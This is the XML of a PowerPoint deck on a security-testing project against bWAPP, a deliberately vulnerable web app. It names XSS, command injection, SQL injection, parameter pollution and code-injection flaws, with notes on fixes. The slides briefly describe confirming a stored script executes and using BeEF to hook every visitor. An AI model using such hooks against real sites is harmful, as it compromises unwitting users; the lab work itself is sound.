              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0F7F7E4-BB49-0246-360E-9343A73BA6AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code injections vulnerability refers to inject code which will be executed by the server. This also means working at operating system level. The scanner detects the eval argument is not sanitized properly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC46549B-FAFD-B489-77E0-C764E06CA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5" y="3590607"/>
            <a:ext cx="6947520" cy="32040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E4C0A31-597F-7724-78FD-E5692F43D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444" y="3590605"/>
            <a:ext cx="5065556" cy="3204019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96169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72E5-95D6-B1A6-D95F-690A3486B311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD4331C-E27F-576E-7334-24CB7DB6A403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS (Offensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection (Offensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection (Defensive and Offensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Parameter Pollution (Offensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XPath (Defensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code Injection (Defensive)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2198923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31E1-1DA9-E0BA-1DD8-B7BC0EA7849B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CODE INJECTION - defensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE25C911-3D49-B253-E98E-6B63013A4D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The solutions provided by the Scanner, unfortunately does not work as intended, because they either use very specific use cases, either are outside of the scope of the eval function. The proper solution is to try to avoid eval function and use only specific functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A computer screen shot of text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1E7312-AEBF-657B-C972-C137BC70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62" y="4743356"/>
            <a:ext cx="5230048" cy="149612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EB51695-908E-0C5C-D846-4EADA5485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942" y="3576726"/>
            <a:ext cx="4935478" cy="3210066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3784252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5880-4905-02F3-A46D-6DB591BF0FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After fixing vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C075B7-7771-7AD2-2B49-98CCA4A09C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0355" y="2789677"/>
            <a:ext cx="7000874" cy="2914008"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3373293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600E-A0AC-096E-D5FF-D4563508CF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DF30E7-CFBB-BC2F-4BC3-285217EC1894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="3204927"/>
            <a:ext cx="9905999" cy="2586274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375930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will test a simple script tag to see if is escaped correctly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF63416B-79C3-77F1-16D5-1265C4F1699D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774470" y="3553152"/>
            <a:ext cx="6639882" cy="3117790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139012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But after hitting submit, we see the script was executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{552D1F1E-1A44-5EAC-5B33-2C6CC11135FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2081906" y="3722913"/>
            <a:ext cx="8025009" cy="2924799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92761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can use now the beef project to exploit this vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>After we installed the hook, every user who visits this website will also have this hook installed for them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62ACDECB-F2B0-30AC-CDA9-AA7E5B1C1C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="41946" r="36410" b="10419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156902" y="4020344"/>
            <a:ext cx="6716511" cy="2421293"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166725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A372-890F-437F-60BC-BCB9C5ECC37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE47EA81-6A09-6958-5AC2-3FEAB0D8B50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can use now the beef project to exploit this vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>After we installed the hook, every user who visits this website will also have this hook installed for them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62ACDECB-F2B0-30AC-CDA9-AA7E5B1C1C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="41946" r="36410" b="10419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156902" y="4020344"/>
            <a:ext cx="6716511" cy="2421293"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259935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BC50427-68ED-4D4E-7493-3B20F60BF8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757" y="564311"/>
            <a:ext cx="11450486" cy="5729377"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167864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474</TotalTime>
  <Words>1010</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>98</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Tw Cen MT</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>QaSSTP presentation - bWapp</vt:lpstr>
      <vt:lpstr>bWapp project</vt:lpstr>
      <vt:lpstr>Approach on security</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>DEFENSIVE APPROACH</vt:lpstr>
      <vt:lpstr>DEFENSIVE APPROACH</vt:lpstr>
      <vt:lpstr>SQL Injection (defensive)</vt:lpstr>
      <vt:lpstr>SQL Injection (defensive)</vt:lpstr>
      <vt:lpstr>Xpath - defensive</vt:lpstr>
      <vt:lpstr>XPATH - Defensive</vt:lpstr>
      <vt:lpstr>Code injection - defensive</vt:lpstr>
      <vt:lpstr>CODE INJECTION - defensive</vt:lpstr>
      <vt:lpstr>After fixing vulnerabilities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QaSSTP presentation - bWapp</dc:title>
  <dc:creator>Terec Andrei Sorin</dc:creator>
  <cp:lastModifiedBy>DAVID-ALEXANDRU POP</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-12T08:28:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-13T18:45:58Z</dcterms:modified>
</cp:coreProperties>
</file>